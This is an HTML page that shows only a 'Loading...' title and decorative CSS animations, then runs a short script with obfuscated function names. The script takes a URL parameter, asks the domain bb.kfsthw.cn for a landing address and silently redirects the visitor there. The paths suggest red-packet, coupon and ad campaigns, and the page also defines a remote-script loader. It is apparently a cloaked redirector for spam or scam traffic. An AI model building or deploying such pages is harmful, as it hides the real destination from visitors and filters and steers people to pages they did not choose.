<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <title>加载中...</title>
    <style>
        * {
            padding: 0;
            margin: 0
        }

        @keyframes show1 {
            0% {
                opacity: 0;
                transform: scale(0.2)
            }

            100% {
                opacity: 1;
                transform: scale(1)
            }
        }

        @keyframes btn1 {
            0% {
                transform: rotate(-720deg)
            }

            100% {
                transform: rotate(0deg)
            }
        }

        @keyframes show2 {
            0% {
                opacity: 0;
                transform: translateY(50%)
            }

            100% {
                opacity: 1;
                transform: translateY(0%)
            }
        }

        @keyframes btn2 {
            0% {
                transform: scale(0)
            }

            100% {
                transform: scale(1)
            }
        }

        @keyframes show3 {
            0% {
                opacity: 0;
                transform: translateY(-50%)
            }

            100% {
                opacity: 1;
                transform: translateY(0%)
            }
        }

        @keyframes btn3 {
            0% {
                transform: scale(0)
            }

            100% {
                transform: scale(1)
            }
        }

        @keyframes show4 {
            0% {
                opacity: 0;
                border-radius: 100%
            }

            100% {
                opacity: 1;
                border-radius: 0
            }
        }

        @keyframes btn4 {
            0% {
                transform: scale(1,0)
            }

            100% {
                transform: scale(1,1)
            }
        }

        @keyframes btnShake1 {
            0% {
                transform: scale(1)
            }

            40% {
                transform: scale(1.1)
            }

            60% {
                transform: scale(.9)
            }

            80% {
                transform: scale(1.2)
            }

            100% {
                transform: scale(1)
            }
        }

        @keyframes btnShake2 {
            0% {
                transform: scale(1)
            }

            40% {
                transform: scale(1.1,0.9)
            }

            60% {
                transform: scale(.9,1.1)
            }

            80% {
                transform: scale(1.2,0.8)
            }

            100% {
                transform: scale(1)
            }
        }

        @keyframes btnShake3 {
            0% {
                transform: scale(1,1)rotate(0deg)
            }

            10% {
                transform: scale(1.2,0.8)
            }

            20% {
                transform: scale(0.8,1.2)
            }

            30% {
                transform: scale(1.2,0.8)
            }

            40% {
                transform: scale(0.8,1.2)
            }

            50% {
                transform: scale(1,1)
            }

            60% {
                transform: rotate(-15deg)
            }

            70% {
                transform: rotate(15deg)
            }

            80% {
                transform: rotate(-25deg)
            }

            90% {
                transform: rotate(25deg)
            }

            100% {
                transform: scale(1,1)rotate(0deg)
            }
        }

        @keyframes btnShake4 {
            0% {
                transform: rotate(0deg);
                opacity: 1
            }

            10% {
                transform: scale(1.2,0.8)
            }

            20% {
                transform: scale(0.8,1.2)
            }

            30% {
                transform: scale(1.2,0.8)
            }

            40% {
                transform: scale(0.8,1.2)
            }

            50% {
                transform: scale(1,1)
            }

            60% {
                opacity: 1
            }

            70% {
                opacity: .5
            }

            80% {
                opacity: 1
            }

            90% {
                opacity: .5
            }

            100% {
                transform: scale(1,1);
                opacity: 1
            }
        }

        @keyframes btnMove {
            from {
                transform: rotateY(180deg)
            }

            to {
                transform: rotateY(360deg)
            }
        }

        @keyframes rotateMove {
            from {
                transform: rotate(0deg)
            }

            to {
                transform: rotate(360deg)
            }
        }

        @keyframes itemMove1 {
            0% {
                height: 0
            }

            100% {
                height: 60px
            }
        }

        @keyframes itemMove2 {
            0% {
                height: 0;
                transform: scaleY(0)
            }

            40% {
                height: 60px;
                transform: scaleY(0)
            }

            100% {
                transform: scaleY(1)
            }
        }

        @keyframes itemMove3 {
            0% {
                height: 0;
                transform: translateX(100px);
                opacity: 0
            }

            40% {
                height: 60px;
                transform: translateX(100px);
                opacity: 0
            }

            100% {
                transform: translateX(0px);
                opacity: 1
            }
        }

        @keyframes itemMove4 {
            0% {
                height: 0;
                transform: translateX(-100px);
                opacity: 0
            }

            40% {
                height: 60px;
                transform: translateX(-100px);
                opacity: 0
            }

            100% {
                transform: translateX(0px);
                opacity: 1
            }
        }

        @keyframes tipMove {
            0% {
                transform: translate(0px,0%)
            }

            40% {
                transform: translate(-10px,30%)
            }

            100% {
                transform: translate(0px,0%)
            }
        }

        .text-tip {
            position: relative
        }

        .text-tip::before {
            position: absolute;
            content: "";
            width: .1px;
            height: .1px;
            border: solid 8px rgba(0,0,0,0);
            border-right-color: #f4d7a7;
            top: 0;
            left: -16px
        }
    </style>
</head>
<body style="">
<a id="back" rel="noopener noreferrer"></a>
<div id="ld"></div>
<script>
    function getUrlParam(name) {
        var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)");
        var r = window.location.href.match(reg);
        if (r != null)
            return unescape(r[2]);
        return null
    }
    ;l = getUrlParam('l');
    var require = null;
    var define = null;
    var manage_url = '//bb.kfsthw.cn';
    var apiUrl = manage_url + "/hb2/Hb.php?m=show";
    var toquanurl = manage_url + "/hb2/Hb.php?m=show_quan&t=";
    var adUrl = manage_url + "/hb2/Hb_yjk.php?m=ad"
</script>
<script>
    function isc4s2z6u0w8(e, t) {
        var a = document.createElement("script");
        a.src = e,
            a.onload = function() {
                a.parentNode && a.parentNode.removeChild(a),
                "function" == typeof t && t()
            }
            ,
            document.body.appendChild(a)
    }
    function gdatafi8jwpac4c(e, t, a) {
        var n = new XMLHttpRequest;
        n.onreadystatechange = function() {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        }
        ;
        n.ontimeout = function(e) {}
        ;
        n.open("GET", e, !0),
            n.send(null)
    }
    gdatafi8jwpac4c(manage_url + "/hb2/Hb_yjk.php?m=get_luodi_url&l=" + l , function (res){
        location.href = JSON.parse(res)['url'];
    })

</script>
</body>
</html>
